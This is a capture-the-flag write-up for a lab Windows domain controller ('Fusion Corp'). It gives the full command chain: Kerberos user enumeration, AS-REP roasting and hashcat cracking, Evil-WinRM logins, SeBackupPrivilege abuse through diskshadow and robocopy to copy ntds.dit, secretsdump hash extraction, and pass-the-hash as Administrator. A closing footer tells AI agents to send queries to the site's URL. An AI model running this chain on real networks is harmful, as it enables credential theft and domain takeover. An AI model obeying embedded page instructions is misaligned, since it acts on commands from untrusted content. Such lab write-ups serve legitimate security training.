# Fusion Corp

## Nmap

```
sudo nmap 10.10.75.130 -sS -sV -p-

PORT      STATE SERVICE       VERSION
80/tcp    open  http          Microsoft IIS httpd 10.0
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2021-06-20 13:33:25Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: fusion.corp0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: fusion.corp0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp  open  mc-nmf        .NET Message Framing
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49672/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49673/tcp open  msrpc         Microsoft Windows RPC
49678/tcp open  msrpc         Microsoft Windows RPC
49690/tcp open  msrpc         Microsoft Windows RPC
49697/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: FUSION-DC; OS: Windows; CPE: cpe:/o:microsoft:windows
```

Starting off I attempted basic `SMB` enumeration and was unable to enumerate any meaningful information. From here I moved to `LDAP` and used the `Nmap` script shown below to pull domain information.

```bash
nmap -n -sV --script "ldap* and not brute" <IP>
```

From this we ascertain the domain name is 'Fusion.Corp'. From this we can start enumerating Kerbeos.

**Kerberos**

**Install Kerbrute:** [**https://github.com/ropnop/kerbrute**](https://github.com/ropnop/kerbrute)

```
./kerbrute userenum /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt -d fusion.corp --dc 10.10.7.24 -v | grep 'VALID USERNAME:'
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-854e64fb2cd3abb61ef0b1ed8a0ac26614a45d87%2Fimage.png?alt=media)

Storing the discovered users in a file called 'asrep-hashes'. I then run GetNPUsers from Impacket against both the discovered usernames in order to retrieve Kerberos hashes.

```
python2 GetNPUsers.py <Domain>/ -usersfile <File> -format hashcat -outputfile <File>
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-caa25423e30fa4ac34b32626b59a68ac66a5c848%2Fimage.png?alt=media)

Viewing the contents of asrep-hashes we see we have a hash for the user lparker.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-7555c9a5dbd89e44fba31eed61091f79bbf4ba5d%2Fimage.png?alt=media)

Running this against Hashcat shows we soon crack the password.

```
hashcat -m 18200 -a 0 asrep-hashes /usr/share/wordlists/rockyou.txt 
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-400c5a03af085d43460589b8b2b36ae9925e88c1%2Fpng1.png?alt=media)

We are then able to utilize the credentials against port 5985 with Evil-WinRM.

```
evil-winrm -i 10.10.22.38 -u lparker -p '<Password>'
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-14d753113473548a6b2bc5f0ba9fef032a939da9%2FCapture_1.png?alt=media)

After grabbing the user flag on the Desktop I started working through basic enumeration. First checking local user accounts we see some interesting information for the user jmurphy.

```
net user jmurphy
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-dbbdaeb249cdf475a17ed1127565930b20ed3b37%2FCapture_2.png?alt=media)

We are then able to login with Evil-WinRM using the new credentials.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-55cb79981d69e7077cfbe57f1c57b64ed792a8fe%2FCapture_3.png?alt=media)

Again, the user flag can be grabbed from the Desktop. From here and as per the above image we see we have the privilege 'SeBackupPrivilege'.

This privilege grants us the ability to create backups of files on the system. Knowing this a high value file would be the ntds.dit file which is a database of hashes for domain objects / users. As the ntds.dit file is in constant use we will be unable to create a backup using normal methods as the system will lock the file.

What we can do instead is create a Distributed Shell File (DSH). This file will contain the appropriate commands for us to run the diskshadow utility against the C: drive and ultimately the ntds.dit file.

First created a file called `viper.dsh` on the attacking machine. Then insert the following contents:

```
set context persistent nowriters
add volume c: alias viper
create
expose %viper% x:
```

Once completed use the command `unix2dos` to convert the file to DOS format.

```
unix2dos viper.dsh
```

Then on the target system create a directory called 'temp' in `c:\temp.` After this upload the `viper.dsh` file.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-d0c83a0360d70db5fb0a744996687dfcd1561812%2Fimage.png?alt=media)

From here run the following commands:

```
diskshadow /s viper.dsh
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-9c51dc7474fa8decd2a203bde3adda1d4faf7fd4%2Fimage.png?alt=media)

```
robocopy /b x:\windows\ntds . ntds.dit
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-2d0dc860f1edca4deaf0056fa113231575787d5a%2Fimage.png?alt=media)

From here we need to extract the SYSTEM hive which will be required for extracting the hashes with Impacket later.

```
reg save hklm\system c:\Temp\system
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-c125eeac49caad1b28dde8de8cb64bacdd2d264e%2Fimage.png?alt=media)

From here we can use the download command to download the ntds.dit and system hive file.

```
download ntds.dit
download system
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-f868d0fba9a37b1fe4907cd7b5d0002767000d2b%2Fimage.png?alt=media)

Back on the attacking machine use the following command with Impacket to extract the hashes from ntds.dit.

```
python2 secretsdump.py -ntds ntds.dit -system system local
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-0bd9fcfa2322ac3f2b55fbf0cdead7bb2b7c4359%2FCapture_4.png?alt=media)

From here we have the Administrator hash which can be used to login to the target system with Evil-WinRM.

```
evil-winrm -i <IP> -u administrator -H '<NT-Hash>'
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-c74180847ef05d02cccd073720e0b9ff635cd38d%2FCapture_5.png?alt=media)

We are now Administrator on the Domain Controller and can grab the final flag from the Desktop.


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://viperone.gitbook.io/pentest-everything/writeups/tryhackme/linux/fusion-corp.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.